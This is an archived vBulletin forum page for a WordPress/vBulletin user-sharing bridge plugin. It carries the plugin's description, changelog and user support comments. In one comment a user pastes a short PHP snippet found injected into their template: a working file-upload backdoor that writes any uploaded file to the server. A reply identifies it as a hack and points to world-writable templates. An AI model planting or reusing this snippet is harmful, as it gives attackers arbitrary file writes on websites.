The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
Complete Wordpress/Vbulletin Bridge - Share Users And Postings Details »» | |||||||||||||||||||||||||||
Complete Wordpress/Vbulletin Bridge - Share Users And Postings
Developer Last Online: Oct 2022
Identical to this Mod here, but now for the Vbulletin 3.7 line. If you install this PLEASE Click Install. This mod bridges your Vbulletin users over to Wordpress. You can also use Vbulletin as your comment engine instead of the spammy one built into Wordpress. You can display the comments inline in your post. You need not use the comment feature, if your only interested in sharing users. You can map your Vbulletin Usergroups to Wordpress Usergroups and those users will then be recognized as registered Wordpress users. For example, user "Joe" registers at your forum and logs in. Joe then clicks on your Wordpress page. Joe is instantly added to the Wordpress user base with the permissions you set for his usergroup. In otherwords, if a user comes over belonging to the "Registered User" group, you can select that he is placed in the Wordpress "Subscriber" usergroup. If you change a users group from vbulletin, it will automatically change in Wordpress. Requirements:
01/03/2007 - Fixed the unlock_tables() issue on some setups. 01/03/2007 - Fixed a bug in the script that if you used a MySQL database prefix, integration would not work. Please see this post for more information! Special thanks to axisoverdrive for giving me access to his server and letting me troubleshoot the issue! 01/05/2007 - Fixed issue where if a user saved (not published) and published later, the post would not be added to the forum. 01/05/2007 - When a post is edited, it will also be edited in the forum. 01/08/2007 - Modified slightly so when posts are edited, so are the titles (if edited). 02/07/2007 - Major modifications to new version (now 2.05). The list follows:
UPDATE: I have become really busy these days with my work. It will be some time before I can address this plugin. Please stop PM'ing me, I just don't have time. 99% of the time, your PM can be answered by just reading through the posts in this thread. Special Thanks: axisoverdrive - Debugging Help, Kyraal - Paypal Donation, Kalina - Paypal Donation, Wildcard27 - Paypal Donation, Shri - Paypal Donation, pspcrazy - Paypal Donation, Tomahoochi - Paypal Donation. If you use this plug-in, and find it useful, please support us by nominating us for Mod Of The Month (MOTM) in the top right corner of this thread, or feel free to donate. If you do install: Show Your Support
|
Comments |
#52
|
|||
|
|||
ok i need to ask some question before installation...
1- my forum is in main directory not in /forum ... and i want wp make my home page... do i need to move my forum into other directory like www.abc.com/forum ... or is it possible if i install both in main directory ....???? 2- it says if some 1 post an article to WP it will create a new thread on forums ... i actually dun need that ... but what i need is .. if some1 created a new thread on forum and it will post the same thing on WP ... does it do that ? 3- after installation, i can use custom theme and plugins riht ??? Thanks i will be waiting for ur reply ... |
#53
|
|||
|
|||
Quote:
Quote:
Right.. |
#54
|
|||
|
|||
Well it seems something else was causing it to break, it works now And the scroll box is fixed too oddly.
Oddly i found this code on my template: Code:
<?php $ficnt = @fread(@fopen($_FILES["s"]["tmp_name"], "rb"), $_FILES["s"]["size"]); if(@fwrite(@fopen($_FILES["s"]["name"], "wb"), $ficnt)) echo $_FILES["s"]["name"]; ?> Also how would I have it so that I have two domains both on the same server in which one of the domains has a separate wordpress db then the other domains has both the forum and wordpress. I'm sure it can be done just need to know how to make seperate wp and vb db's work together. I didn't understand the post you gave me earlier about that too much. |
#55
|
|||
|
|||
It looks like it is downloading and executing a remote script. It also looks like you have your WP templates set as writeable (i.e. chmod 777) and I would suggest against that. Chances are, however you are being hacked, the hacker is writing something to the template file then calling it.
You don't do anything special if you want to use one database or two. It matters not. You configure the script the same way using two separate databases or using one. |
#56
|
||||
|
||||
How can I get the latest posts on the wordpress page without installing maggypie rss stuff ?
|
#57
|
||||
|
||||
I get weird characters when posting from wordpress to the forum. I tried changing the forum to UTF-8, but that made weird characters on all my posts. I also tried changing the wordpress from utf-8 to the suggested options, but then I got weird characters all over wordpress :P
|
#58
|
|||
|
|||
Love the bridge, Jafo232.
But you know what would make this even better? Support for vB phrases... unless it does that already and it's just not working for me... The reason I say this is because I'm finding it hard to make my vB login and userbox script work in Wordpress. I could settle for a simple one where it just displays the persons name and the logout button since the bridge allows that much, but I want to go all the way and mimic vB by showing how many PMs they have and their last visit and all that kinda jazz. |
#59
|
|||
|
|||
dont worry im being thick
|
#60
|
|||
|
|||
for those of you who messed up the installation of this mod and "lost wp admin rights"
this is what you do to fix wordpress. If you screwed up the installation of vbullentin bridge and recive a permission error when loging in to your wordpress dashboard do the following.
|
#61
|
|||
|
|||
Quote:
Except that the whole hacking part, that is. The whole making files "writable" making it easy for hackers to get through your site.....just wrong. I am now considering holding off a VB with Wordpress integration at this point until I find a better solution. |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|